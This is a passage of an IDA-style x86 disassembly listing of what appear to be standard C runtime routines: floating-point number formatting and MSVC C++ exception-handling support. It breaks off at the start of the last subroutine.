; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC14 proc near ; DATA XREF: sub_418377+14�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_41CC3D
lea eax, [ebp+var_8]
push eax
call sub_4207CB
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_41CC3D: ; CODE XREF: sub_41CC14+C�j
lea eax, [ebp+arg_8]
push eax
call sub_4207F8
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_41CC14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC52 proc near ; CODE XREF: sub_41CECF+17�p
; sub_41CF19+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp byte_445EDC+0D444Ch, 0
push ebx
push esi
jz short loc_41CC87
mov ebx, [ebp+arg_8]
mov eax, dword ptr byte_445EDC+0D4448h
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_41CF6A
pop ecx
pop ecx
jmp short loc_41CCBF
; ---------------------------------------------------------------------------
loc_41CC87: ; CODE XREF: sub_41CC52+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_42089C
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_420825
add esp, 14h
loc_41CCBF: ; CODE XREF: sub_41CC52+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_41CCCB
mov byte ptr [eax], 2Dh
inc eax
loc_41CCCB: ; CODE XREF: sub_41CC52+73�j
test ebx, ebx
jle short loc_41CCE3
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, byte_43DF40
mov eax, edi
pop edi
mov [eax], cl
loc_41CCE3: ; CODE XREF: sub_41CC52+7B�j
xor ecx, ecx
push 424840h
cmp byte_445EDC+0D444Ch, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_417FE0
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_41CD0A
mov byte ptr [ecx], 45h
loc_41CD0A: ; CODE XREF: sub_41CC52+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41CD4F
mov ebx, [esi+4]
dec ebx
jns short loc_41CD1E
neg ebx
mov byte ptr [ecx], 2Dh
loc_41CD1E: ; CODE XREF: sub_41CC52+C5�j
inc ecx
cmp ebx, 64h
jl short loc_41CD35
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41CD35: ; CODE XREF: sub_41CC52+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_41CD4C
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41CD4C: ; CODE XREF: sub_41CC52+E7�j
add [ecx+1], bl
loc_41CD4F: ; CODE XREF: sub_41CC52+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_41CC52 endp
; =============== S U B R O U T I N E =======================================
sub_41CD56 proc near ; CODE XREF: sub_41CEF6+13�p
; sub_41CF19+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp byte_445EDC+0D444Ch, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_41CD91
mov eax, dword ptr byte_445EDC+0D4450h
mov ebx, [esp+10h+arg_8]
mov esi, dword ptr byte_445EDC+0D4448h
cmp eax, ebx
jnz short loc_41CDC1
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_41CDC1
; ---------------------------------------------------------------------------
loc_41CD91: ; CODE XREF: sub_41CD56+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+18h+var_18]
call sub_42089C
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_420825
add esp, 14h
loc_41CDC1: ; CODE XREF: sub_41CD56+22�j
; sub_41CD56+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_41CDCF
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_41CDCF: ; CODE XREF: sub_41CD56+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_41CDE6
push 1
push edi
call sub_41CF6A
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_41CDE8
; ---------------------------------------------------------------------------
loc_41CDE6: ; CODE XREF: sub_41CD56+7E�j
add edi, eax
loc_41CDE8: ; CODE XREF: sub_41CD56+8E�j
test ebx, ebx
jle short loc_41CE2D
push 1
push edi
call sub_41CF6A
mov al, byte_43DF40
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_41CE2D
cmp byte_445EDC+0D444Ch, 0
jz short loc_41CE12
neg esi
jmp short loc_41CE18
; ---------------------------------------------------------------------------
loc_41CE12: ; CODE XREF: sub_41CD56+B6�j
neg esi
cmp ebx, esi
jl short loc_41CE1A
loc_41CE18: ; CODE XREF: sub_41CD56+BA�j
mov ebx, esi
loc_41CE1A: ; CODE XREF: sub_41CD56+C0�j
push ebx
push edi
call sub_41CF6A
push ebx
push 30h
push edi
call sub_4179E0
add esp, 14h
loc_41CE2D: ; CODE XREF: sub_41CD56+94�j
; sub_41CD56+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_41CD56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE34 proc near ; CODE XREF: sub_41CF19+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_42089C
mov dword ptr byte_445EDC+0D4448h, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov dword ptr byte_445EDC+0D4450h, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_420825
mov eax, dword ptr byte_445EDC+0D4448h
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp dword ptr byte_445EDC+0D4450h, ecx
setl cl
mov byte_445EDC+0D4454h, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov dword ptr byte_445EDC+0D4450h, eax
jl short loc_41CEBA
cmp eax, ebx
jge short loc_41CEBA
test cl, cl
jz short loc_41CEAB
loc_41CEA1: ; CODE XREF: sub_41CE34+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_41CEA1
and [esi-2], al
loc_41CEAB: ; CODE XREF: sub_41CE34+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_41CEF6
add esp, 0Ch
jmp short loc_41CECA
; ---------------------------------------------------------------------------
loc_41CEBA: ; CODE XREF: sub_41CE34+63�j
; sub_41CE34+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_41CECF
add esp, 10h
loc_41CECA: ; CODE XREF: sub_41CE34+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41CE34 endp
; =============== S U B R O U T I N E =======================================
sub_41CECF proc near ; CODE XREF: sub_41CE34+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov byte_445EDC+0D444Ch, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41CC52
and byte_445EDC+0D444Ch, 0
add esp, 10h
retn
sub_41CECF endp
; =============== S U B R O U T I N E =======================================
sub_41CEF6 proc near ; CODE XREF: sub_41CE34+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov byte_445EDC+0D444Ch, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41CD56
and byte_445EDC+0D444Ch, 0
add esp, 0Ch
retn
sub_41CEF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF19 proc near ; DATA XREF: sub_418377�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_41CF54
cmp [ebp+arg_8], 45h
jz short loc_41CF54
cmp [ebp+arg_8], 66h
jnz short loc_41CF41
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CD56
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41CF41: ; CODE XREF: sub_41CF19+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CE34
jmp short loc_41CF65
; ---------------------------------------------------------------------------
loc_41CF54: ; CODE XREF: sub_41CF19+7�j
; sub_41CF19+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CC52
loc_41CF65: ; CODE XREF: sub_41CF19+39�j
add esp, 10h
pop ebp
retn
sub_41CF19 endp
; =============== S U B R O U T I N E =======================================
sub_41CF6A proc near ; CODE XREF: sub_41CC52+2C�p
; sub_41CD56+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_41CF8D
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_4180D0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_4188B0
add esp, 10h
pop esi
loc_41CF8D: ; CODE XREF: sub_41CF6A+7�j
pop edi
retn
sub_41CF6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF8F proc near ; CODE XREF: .text:00418558�p
; sub_4185C1+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_41CFA5
call sub_41D832
loc_41CFA5: ; CODE XREF: sub_41CF8F+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41CFCD
cmp dword ptr [esi+4], 0
jz short loc_41D023
cmp [ebp+arg_14], 0
jnz short loc_41D023
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41D2D6
add esp, 10h
jmp short loc_41D023
; ---------------------------------------------------------------------------
loc_41CFCD: ; CODE XREF: sub_41CF8F+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41D023
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41D007
cmp [eax+14h], edi
jbe short loc_41D007
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41D007
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41D026
; ---------------------------------------------------------------------------
loc_41D007: ; CODE XREF: sub_41CF8F+4A�j
; sub_41CF8F+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41D02A
add esp, 20h
loc_41D023: ; CODE XREF: sub_41CF8F+23�j
; sub_41CF8F+29�j ...
push 1
pop eax
loc_41D026: ; CODE XREF: sub_41CF8F+76�j
pop edi
pop esi
pop ebp
retn
sub_41CF8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D02A proc near ; CODE XREF: sub_41CF8F+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_41D04A
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41D04F
loc_41D04A: ; CODE XREF: sub_41D02A+16�j
call sub_41D832
loc_41D04F: ; CODE XREF: sub_41D02A+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_41D1A6
cmp dword ptr [esi+10h], 3
jnz short loc_41D0C3
cmp [esi+14h], edi
jnz short loc_41D0C3
cmp dword ptr [esi+1Ch], 0
jnz short loc_41D0C3
mov esi, dword ptr byte_445EDC+0D4458h
test esi, esi
jz loc_41D1A1
mov eax, dword ptr byte_445EDC+0D445Ch
push 1 ; ucb
push esi ; lp
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_420A23
pop ecx
test eax, eax
pop ecx
jnz short loc_41D0A5
call sub_41D832
loc_41D0A5: ; CODE XREF: sub_41D02A+74�j
cmp [esi], ebx
jnz loc_41D1A6
cmp dword ptr [esi+10h], 3
jnz short loc_41D0C3
cmp [esi+14h], edi
jnz short loc_41D0C3
cmp dword ptr [esi+1Ch], 0
jnz short loc_41D0C3
call sub_41D832
loc_41D0C3: ; CODE XREF: sub_41D02A+41�j
; sub_41D02A+46�j ...
cmp [esi], ebx
jnz loc_41D1A6
cmp dword ptr [esi+10h], 3
jnz loc_41D1A6
cmp [esi+14h], edi
jnz loc_41D1A6
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_41870F
add esp, 14h
mov ebx, eax
loc_41D0FA: ; CODE XREF: sub_41D02A+162�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_41D191
cmp [ebx], edi
jg short loc_41D186
cmp edi, [ebx+4]
jg short loc_41D186
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_41D183
loc_41D11F: ; CODE XREF: sub_41D02A+131�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_41D150
loc_41D131: ; CODE XREF: sub_41D02A+124�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_41D279
add esp, 0Ch
test eax, eax
jnz short loc_41D15F
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_41D131
loc_41D150: ; CODE XREF: sub_41D02A+105�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_41D11F
jmp short loc_41D183
; ---------------------------------------------------------------------------
loc_41D15F: ; CODE XREF: sub_41D02A+119�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41D38A
add esp, 2Ch
loc_41D183: ; CODE XREF: sub_41D02A+F3�j
; sub_41D02A+133�j
mov edi, [ebp+var_10]
loc_41D186: ; CODE XREF: sub_41D02A+DE�j
; sub_41D02A+E3�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_41D0FA
; ---------------------------------------------------------------------------
loc_41D191: ; CODE XREF: sub_41D02A+D6�j
cmp [ebp+arg_14], 0
jz short loc_41D1A1
push 1
push esi
call sub_41D6FF
pop ecx
pop ecx
loc_41D1A1: ; CODE XREF: sub_41D02A+56�j
; sub_41D02A+16B�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41D1A6: ; CODE XREF: sub_41D02A+37�j
; sub_41D02A+7D�j ...
cmp [ebp+arg_14], 0
jnz short loc_41D1CC
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41D1D1
add esp, 20h
jmp short loc_41D1A1
; ---------------------------------------------------------------------------
loc_41D1CC: ; CODE XREF: sub_41D02A+180�j
jmp sub_41D7DC
sub_41D02A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D1D1 proc near ; CODE XREF: sub_41D02A+198�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
cmp dword ptr byte_445EDC+0D4460h, 0
push esi
push edi
jz short loc_41D202
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4185E6
add esp, 1Ch
test eax, eax
jnz short loc_41D275
loc_41D202: ; CODE XREF: sub_41D1D1+E�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_41870F
add esp, 14h
mov esi, eax
loc_41D21E: ; CODE XREF: sub_41D1D1+A2�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_41D275
cmp edi, [esi]
jl short loc_41D26D
cmp edi, [esi+4]
jg short loc_41D26D
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41D247
cmp byte ptr [ecx+8], 0
jnz short loc_41D26D
loc_41D247: ; CODE XREF: sub_41D1D1+6E�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41D38A
add esp, 2Ch
loc_41D26D: ; CODE XREF: sub_41D1D1+57�j
; sub_41D1D1+5C�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_41D21E
; ---------------------------------------------------------------------------
loc_41D275: ; CODE XREF: sub_41D1D1+2F�j
; sub_41D1D1+53�j
pop edi
pop esi
leave
retn
sub_41D1D1 endp
; =============== S U B R O U T I N E =======================================
sub_41D279 proc near ; CODE XREF: sub_41D02A+10F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_41D2D0
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_41D2D0
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_41D2AA
add ecx, 8
push ecx
push edx
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_41D2CC
loc_41D2AA: ; CODE XREF: sub_41D279+1F�j
test byte ptr [esi], 2
jz short loc_41D2B4
test byte ptr [edi], 8
jz short loc_41D2CC
loc_41D2B4: ; CODE XREF: sub_41D279+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_41D2C3
test byte ptr [edi], 1
jz short loc_41D2CC
loc_41D2C3: ; CODE XREF: sub_41D279+43�j
test al, 2
jz short loc_41D2D0
test byte ptr [edi], 2
jnz short loc_41D2D0
loc_41D2CC: ; CODE XREF: sub_41D279+2F�j
; sub_41D279+39�j ...
xor eax, eax
jmp short loc_41D2D3
; ---------------------------------------------------------------------------
loc_41D2D0: ; CODE XREF: sub_41D279+B�j
; sub_41D279+14�j ...
push 1
pop eax
loc_41D2D3: ; CODE XREF: sub_41D279+55�j
pop edi
pop esi
retn
sub_41D279 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D2D6 proc near ; CODE XREF: sub_41CF8F+34�p
; sub_41D38A+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 424848h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_41D308: ; CODE XREF: sub_41D2D6+8A�j
cmp esi, [ebp+arg_C]
jz short loc_41D362
cmp esi, 0FFFFFFFFh
jle short loc_41D317
cmp esi, [edi+4]
jl short loc_41D31C
loc_41D317: ; CODE XREF: sub_41D2D6+3A�j
call sub_41D832
loc_41D31C: ; CODE XREF: sub_41D2D6+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_41D337
push 103h
push ebx
push eax
call sub_41D790
loc_41D337: ; CODE XREF: sub_41D2D6+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41D357
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_41D374
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_41D357: ; CODE XREF: sub_41D2D6+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_41D308
; ---------------------------------------------------------------------------
loc_41D362: ; CODE XREF: sub_41D2D6+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D2D6 endp
; =============== S U B R O U T I N E =======================================
sub_41D374 proc near ; CODE XREF: sub_41D2D6+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41D385
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41D385: ; CODE XREF: sub_41D374+C�j
jmp sub_41D7DC
sub_41D374 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D38A proc near ; CODE XREF: sub_41D02A+151�p
; sub_41D1D1+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_41D3AC
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_41D53B
add esp, 10h
loc_41D3AC: ; CODE XREF: sub_41D38A+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_41D3B8
push edi
jmp short loc_41D3BB
; ---------------------------------------------------------------------------
loc_41D3B8: ; CODE XREF: sub_41D38A+29�j
push [ebp+arg_24]
loc_41D3BB: ; CODE XREF: sub_41D38A+2C�j
call sub_4184E8
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_41D2D6
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_41D405
add esp, 2Ch
test eax, eax
jz short loc_41D400
push edi
push eax
call sub_4184A6
loc_41D400: ; CODE XREF: sub_41D38A+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41D38A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D405 proc near ; CODE XREF: sub_41D38A+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 424858h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
xor ebx, ebx
mov [ebp+var_24], ebx
mov esi, [ebp+arg_4]
mov ecx, [esi-4]
mov [ebp+var_28], ecx
mov ecx, dword ptr byte_445EDC+0D4458h
mov [ebp+var_1C], ecx
mov ecx, dword ptr byte_445EDC+0D445Ch
mov [ebp+var_20], ecx
mov edi, [ebp+arg_0]
mov dword ptr byte_445EDC+0D4458h, edi
mov ecx, [ebp+arg_8]
mov dword ptr byte_445EDC+0D445Ch, ecx
mov [ebp+var_4], ebx
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push esi
call sub_41856D
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], ebx
or [ebp+var_4], 0FFFFFFFFh
call sub_41D4CB
mov eax, [ebp+var_2C]
loc_41D492: ; CODE XREF: .text:0041D4C1�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41D405 endp
; ---------------------------------------------------------------------------
push dword ptr [ebp-14h]
call sub_41D511
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_4187CE
pop ecx
pop ecx
xor eax, eax
jmp short loc_41D492
; ---------------------------------------------------------------------------
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_41D4CB proc near ; CODE XREF: sub_41D405+85�p
mov eax, [ebp-28h]
mov [esi-4], eax
mov eax, [ebp-1Ch]
mov dword ptr byte_445EDC+0D4458h, eax
mov eax, [ebp-20h]
mov dword ptr byte_445EDC+0D445Ch, eax
cmp dword ptr [edi], 0E06D7363h
jnz short locret_41D510
cmp dword ptr [edi+10h], 3
jnz short locret_41D510
cmp dword ptr [edi+14h], 19930520h
jnz short locret_41D510
cmp [ebp-24h], ebx
jnz short locret_41D510
cmp [ebp-2Ch], ebx
jz short locret_41D510
call sub_418836
push eax
push edi
call sub_41D6FF
pop ecx
pop ecx
locret_41D510: ; CODE XREF: sub_41D4CB+1C�j
; sub_41D4CB+22�j ...
retn
sub_41D4CB endp
; =============== S U B R O U T I N E =======================================
sub_41D511 proc near ; CODE XREF: .text:0041D4A4�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41D538
cmp dword ptr [eax+10h], 3
jnz short loc_41D538
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41D538
cmp dword ptr [eax+1Ch], 0
jnz short loc_41D538
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D538: ; CODE XREF: sub_41D511+C�j
; sub_41D511+12�j ...
xor eax, eax
retn
sub_41D511 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D53B proc near ; CODE XREF: sub_41D38A+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
